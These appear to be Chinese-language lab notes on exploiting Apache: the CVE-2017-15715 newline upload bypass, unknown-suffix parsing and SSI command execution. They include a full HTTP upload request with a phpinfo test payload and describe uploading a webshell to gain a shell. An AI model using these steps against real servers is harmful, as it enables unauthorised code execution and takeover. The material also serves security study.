Apache解析漏洞

cve-2017-15715
1.通过POST请求构造一个文件上传，上传的文件名为：nz.php

一个上传文件的表单构造
POST / HTTP/1.1
Host: 192.168.199.151
Content-Length: 227
Cache-Control: max-age=0
Origin: http://192.168.199.151
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0haARlGnBy4wXjCT
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.199.151/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary0haARlGnBy4wXjCT
Content-Disposition: form-data; name=“file_upload”; filename=“phpinfo.php”
Content-Type: application/octet-stream

<?php phpinfo(); ?>

------WebKitFormBoundary0haARlGnBy4wXjCT–

2.这时，发送请求会给你一个bad file；什么意思呢？我们所构造的php文件被拦截下来了。那么该如何绕过拦截呢？通过%0A截断绕过。

3.POST请求完成后，再通过GET请求请求你所构造的页面。发现我们所构造的PHP被成功解析执行。

那么我们就可构造恶意的php木马进行攻击 ，这里就不演示了。

apache httpd 未知后缀解析漏洞

当apache遇到无法识别解析的文件后缀时，会向前解析，所以我们只需要将木马的后缀改为.jpeg即可。这里我的木马名为1.php.2.jpeg。

同样，这里也可以构造php木马。

Apache SSI 远程命令执行漏洞

通过构造POST请求提交nz.shtml

访问http://192.168.199.151:8080/nz.shtml，发现命令已成功执行。

这里还可以通过http://192.168.199.151:8080/upload.php上传一句话木马xiaoma.php3
然后通过蚁剑连接上传大马，即可拿到shell。